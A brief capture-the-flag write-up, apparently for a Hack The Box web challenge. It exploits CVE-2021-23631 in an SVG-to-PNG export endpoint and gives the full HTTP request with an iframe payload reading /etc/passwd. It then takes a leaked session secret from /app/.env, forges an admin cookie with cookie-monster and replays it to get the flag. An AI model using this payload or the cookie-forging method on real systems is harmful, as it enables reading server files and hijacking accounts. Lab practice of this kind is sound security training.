Tags: cve-2021-23631 cookie
Rating: 2.0
Got a way to display file via svg to png LFI CVE-2021-23631:
```
POST /api/export HTTP/1.1
Host: 138.68.175.87:30484
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.175.87:30484/dashboard
Content-Type: application/json
Origin: http://138.68.175.87:30484
Content-Length: 283
DNT: 1
Connection: close
Cookie: session.sig=4u6WkhlFO5u5hCXaxOP-HGYLD9s; session=eyJ1c2VybmFtZSI6InRlc3QyIn0=
{"svg":"`<svg-dummy></svg-dummy><iframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"></iframe><svg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"http://www.w3.org/2000/svg\"><text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text></svg>`"}
```
Got the secret to sign/verify cookie in /app/.env
`SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db``
Used cookie-monster to generate the cookie:
```
root@sd-127123:/tmp# cat test.json
{"username":"admin"}
root@sd-127123:/tmp# cookie-monster -e -f test.json -k 5921719c3037662e94250307ec5ed1db
_ _
_/0\/ \_
.-. .-` \_/\0/ '-.
/:::\ / ,_________, \
/\:::/ \ '. (:::/ `'-;
\ `-'`\ '._ `"'"'\__ \
`'-. \ `)-=-=( `, |
\ `-"` `"-` /
[+] Data Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
[+] Signature Cookie: session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
```
Burp repeater:
```
GET /dashboard HTTP/1.1
Host: 138.68.150.120:31876
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.150.120:31876/
DNT: 1
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=; session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Upgrade-Insecure-Requests: 1
```
The flag is in the source code response:
`var flag = 'HTB{ZZZZZZZZZZZZZZZZZZZZZZ}'`